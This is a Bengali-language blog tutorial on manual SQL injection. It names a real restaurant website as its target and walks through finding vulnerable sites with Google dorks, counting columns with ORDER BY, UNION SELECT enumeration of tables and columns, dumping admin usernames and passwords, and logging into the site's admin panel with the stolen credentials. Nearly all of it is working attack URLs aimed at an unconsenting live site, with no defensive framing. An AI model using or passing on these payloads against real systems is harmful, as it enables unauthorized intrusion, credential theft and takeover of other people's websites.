Hacking website using sql injection (manual) ~ Tips-Tune

আজকে আমি আপনাদের sql injection এর টিউটোরিয়াল দেখাবো ম্যানুয়াল মেথড এ তো কথা না বারিয়ে কাজে চলে যাই

প্রথমে আমাদের কাজ হচ্ছে একটা vulnerable সাইট বের করতে হবে সেই জন্য আমরা google dork ব্যাবহার করতে পারি আমরা গুগলে সার্চ করলে অনেক dork পেয়ে যাবো।

google dork এর কিছু উদাহরনঃ

inurl:index.php?id=

inurl:view.php?id=

inurl:contact.php?id=

etc...etc...

এই dork গুল আমরা গুগলে লিখে সার্চ দিলে অনেক গুল সাইট পাবো সাধারণত যেই সাইট গুল পাবো সেই গুলই আমাদের টার্গেট এইখান থেকে আমরা vulnerable সাইট কোন গুল তা বের করবো সেজন্য আমাদের URL এর শেষে এক্তা স্ট্রিং ( ' ) যুক্ত করতে হবে।স্ট্রিং যুক্ত করার পর আমরা সাইট টি লোড দিবো যদি কোন প্রকার এরর আসে অথবা কোন কিছু মিসিং হয় তাহলে বুজব সাইট টি vulnerable তখন আমরা সামনে জেতে পারবো।

এখানে আমাদের টার্গেট হচ্ছে

www.cafe53rd.com

এখানে আমরা inject করার জন্য www.cafe53rd.com/menu.php?item_id=3 এই URL টি ব্যাবহার করবো আমরা যদি এই URL এর শেষে স্ট্রিং ( ' ) দেই অর্থাৎ www.cafe53rd.com/menu.php?item_id=3' যদি এই URL টি ব্রাউজার এ লোড করি তাহলে দেখব আগের চেয়ে কিছু জিনিশ মিসিং করছে তারমানে আমাদের টার্গেট vulnerable

এখন আমাদের প্রথম কাজ হচ্ছে সাইটের কলাম কাউন্ট বের করা সে জন্য আমরা URL এর শেষে order by কমান্ড দিবো

অর্থাৎ www.cafe53rd.com/menu.php?item_id=3+order+by+15-- এখানে দেখেন আমরা সাইটের শেষে +order+by+15-- সবাই অবশ্যই শেষে দুইটা হাইফেন (--) দিতে ভুলবেন না।এখন অনেকের মনে প্রশ্ন আসতে পারে আমি মাঝখানে 15 দিলাম কেন।আসলে আমি এখানে কলাম কউন্ট খুজার চেষ্টা করছি আমি 15 দিয়ে শুরু করলাম এইখানে যদি আমরা URL টি লোড করি তাহলে দেখব যে সাইট টি তে মিসিং আসে কিছু তথ্য অন্যান্য সাইট এ এরর আসতে পারে যাই হোক তারমানে আমাদের বুজতে হবে যে সাইট এর কলাম কউন্ট 15 এর কম যদি এরর বা মিসিং না হত তা হলে বুজতে হতো কলাম কউন্ট 15 এর বেশি ওকে এখন আমরা 10 দিয়ে চেষ্টা করব তাহলে আমাদের URL হয় www.cafe53rd.com/menu.php?item_id=3+order+by+10-- এখন যদি আমরা URL টি লোড করি তাহলে দেখব সাইটটি নরমালি লোড হচ্ছে তারমানে যা বুজতে পারলাম আমাদের কলাম কউন্ট 15 এর চেয়ে কম এবং 10 এর চেয়ে বেশি এখন তাহলে আমরা 12 দিএ চেষ্টা করি তাহলে URL টি হয় www.cafe53rd.com/menu.php?item_id=3+order+by+12-- এখন যদি আমরা URL টি লোড করি তাহলে দেখতে পারব যে সাইটে কিছু মিসিং আছে তার মানে আমরা বুজতে পারছি যে আমাদের কলাম কাউন্ট 12 এর কম এবং 10 এর চেয়ে বেশি তার মানে আমরা খুব সহজেই বুজতে পারছি যে আমাদের কলাম কউন্ট 11 এখন আমরা এই 11 টি কলাম এর মদ্ধে বের করব কোন কলাম টি vulnerable সেজন্য আমরা union select কমান্ড দিবো তাহলে আমাদের URL দাড়ায় www.cafe53rd.com/menu.php?item_id=-3+union+select+1,2,3,4,5,6,7,8,9,10,11-- এখানে একটা জিনিষ লক্ষ্য করেন আমি প্রথমে 3 এর আগে একটি হাইফেন ( - ) দিয়েছি আপনি আপনার target এর লাস্ট যে ডিজিট থাকবে তার আগে একটি হাইফেন দিয়ে তারপর +union+select+ লেখেবন তারপর যে কয়টা কলাম পাবেন সেকয়টা পরপর লেখবেন আমরা কলাম কউন্ট পেয়েছি 11 টি তাই 1-11 পর্যন্ত লেখিছি যদি এই কমান্ড টি ব্রাউজার এ লোড দেন তাহলে দেখতে পারবেন আমাদের vulnerable কলাম দেখাচ্ছে আমাদের টার্গেট এর vulnerable কলাম 4 অর্থাৎ আমাদের সকল কমান্ড 4 এর মদ্ধে দিতে হবে এখন যদি কোন কিছু পরিবর্তন না করে শুদু 4 এর জায়গায় @@version লিখে ব্রাউজার এ লোড করি তাহলে দেখব আমাদের mysql version দেখিয়ে দিবে আমাদের টার্গেট এর mysql version হচ্ছে 5.5.36-cll-lve অর্থাৎ আমাদের টার্গেট এর mysql version 5.5.36

এখন আমরা tables বের করবো সেজন্য আমাদের 4 এর জায়গায় group_concat(table_name) লেখতে হবে এবং লাস্ট এ +from+information_schema.tables+where+table_schema=database()-- এতোটুকু লেখতে হবে তাহলে আমাদের URL দাড়ায়

www.cafe53rd.com/menu.php?item_id=-3+union+select+1,2,3,group_concat(table_name),5,6,7,8,9,10,11+from+information_schema.tables+where+table_schema=database()--

এখন এই URL টি লিখে ব্রাউজার এ লোড দিলে দেখব আমাদের tables দেখিয়ে দিবে আমরা যেহেতু সাইট এর ইউজারনেম এবং পাসওয়ার্ড বের করবো সুতরাং আমরা বুজতেই পারছি admin tables এর মদ্ধে আমাদের ইউজারনেম এবং পাসওয়ার্ড পাবো অন্যান্য সাইট এ একটু ভিন্ন থাকতে পারে যেমন users,tbl_admin এরকম কিছু থাকতে পারে এখন আমরা দেখব admin tables এ কি কি আছে সেজন্য আমরা প্রথমে hackbar add on টি ইন্সটল করে নিব এটি ফায়ারফক্স এর জন্য www.addons.mozilla.org/en-US/firefox/addon/hackbar/ এই URL থেকে আমরা add on টি ইন্সটল করে নিতে পারি ইন্সটল করার পর আমরা যদি কীবোর্ড থেকে F9 প্রেস করি তাহলে আমাদের ব্রাউজার এ একটি বার দেখতে পারব এটি হছে আমাদের hackbar এখন আমাদের কাজ হচ্ছে আমরা hackbar থেকে জেই tables ব্যাবহার করবো সেটা CHAR এর কনভার্ট করা কনভার্ট করার জন্য আমরা hackbar যে sql নামে একটি অপশন দেখতে পারছি সেখানে ক্লিক করে mysql এ ক্লিক করে নিচে দেখব যে mysql CHAR() নাম এ একটি অপশন আসে ওইটি ক্লিক করব এখন আমাদের যে পপ আপ টি আসবে অইখানে admin লেখব কারন আমাদের tables থেকে আমরা তথ্য বের করবো এখন ok প্রেস করলে দেখতে পারব CHAR(97, 100, 109, 105, 110) এই লেখা টি আসছে তারমানে আমাদের admin table কে CHAR এ কনভার্ট করলে হয় (97, 100, 109, 105, 110) এটি এখন আমরা এই CHAR দিয়ে আমাদের admin table এর ভিতর থেকে কলাম বের করব তাহলে আমাদের URL টি হবে
www.cafe53rd.com/menu.php?item_id=-3+union+select+1,2,3,group_concat(column_name),5,6,7,8,9,10,11+from+information_schema.columns+where+table_name=CHAR(97, 100, 109, 105, 110)--

এখানে আমি group_concat(table_name) এ table এর জায়গায় column লিখলাম কারন আমরা কলাম বের করবো তারপর information_schema.tables এ tables এর জায়গায় columns লিখলাম তারপর where+table_schema= এ schema এর জায়গায় name লিখলাম তারপর একটা সমান ( = ) দিয়ে আমরা যে CHAR পেয়েছিলাম hackbar থেকে অইটা দেব এখন আমরা URL টি ব্রাউজারে লোড করলে আমরা আমাদের টার্গেট এর কলাম দেখতে পারব এখানে আমাদের টার্গেট এর কলাম গুল হচ্ছে

name,username,password,cnumber,email

এখন আমরা শুদু username,password এই দুইটি কলাম ব্যাবহার করবো আপনারা চাইলে অন্য গুল থেকে অন্যান্য তথ্য বের করতে পারেন এখন তাহলে আমাদের URL টি হয়

www.cafe53rd.com/menu.php?item_id=-3+union+select+1,2,3,group_concat(username,0x3a,password,0x3a),5,6,7,8,9,10,11+from+admin--

এটা আমাদের লাস্ট কমান্ড এখানে আমরা group_concat(column_name) এ (column_name) জায়গায় (username,0x3a,password,0x3a) দিয়েছি কারন আমরা username এবং password কলাম থেকে তথ্য বের করবো আর সবাই মনে রাখবেন কলাম এর শেষে 0x3a দিতে হবে আপনি যদি আরো কোন তথ্য বের করতে চান তাহলে শুদু একটি কমা দিয়ে কলাম লিখে আবার একটি কমা দিয়ে 0x3x লিখবেন অর্থাৎ (username,0x3a,password,0x3a,email,0x3a) এইরকম তারপর আমরা কলাম কউন্ট এর পর যা আছে সব কেটে দিয়ে শুদু +form+table-- এখানে table এর জায়গায় দিতে হবে আমরা যেই table টি ব্যাবহার করেছি আমরা admin table টি ব্যাবহার করেছি তাই আমি admin দিয়েছি এখন আমরা উপরের URL টি ব্রাউজার এ লোড করলে দেখব ইউজারনেম এবং পাসওয়ার্ড পেয়ে গেছি আমাদের টার্গেট এর ইউজারনেম admin এবং পাসওয়ার্ড cafe53 আমরা লগিন করে দেখব

www.cafe53rd.com/admin এটি আমাদের টার্গেট এর লগিন প্যানেল এখান থেকে আমরা লগিন করতে পারব এবং সফল ভাবে লগিন করতে পেরেছি।অনেকের মনে প্রশ্ন আসতে পারে আমি কিভাবে লগিন প্যানেল বের করলাম আপনার গুগলে অনেক এডমিন প্যানেল ফাইন্ডার টুলস পাবেন অথবা আপনারা www.scan.subhashdasyam.com/admin-panel-finder.php এই সাইট টি ব্যাবহার করতে পারেন লগিন প্যানেল বের করার জন্য।

সবার কাছে বরিং মনে হলেও হয়তবা কারো কিছু হলেও উপকার হবে।ধন্যবাদ সবাইকে এতো কষ্ট করে টিউটোরিয়াল টি পরার জন্য।সবাই ভাল থাকবেন কারো কোন সমস্যা থাকলে অবশ্যই টিউমেন্ট এ জানাবেন।

বিঃ দ্রঃ অনেক সাইট আছে যার লগিন প্যানেল নাই তাহলে আপনি লগিন করতে পারবেন না তাহলে পরবর্তী সাইট চেষ্টা করতে হবে

Hacking website using sql injection (manual)

Related Post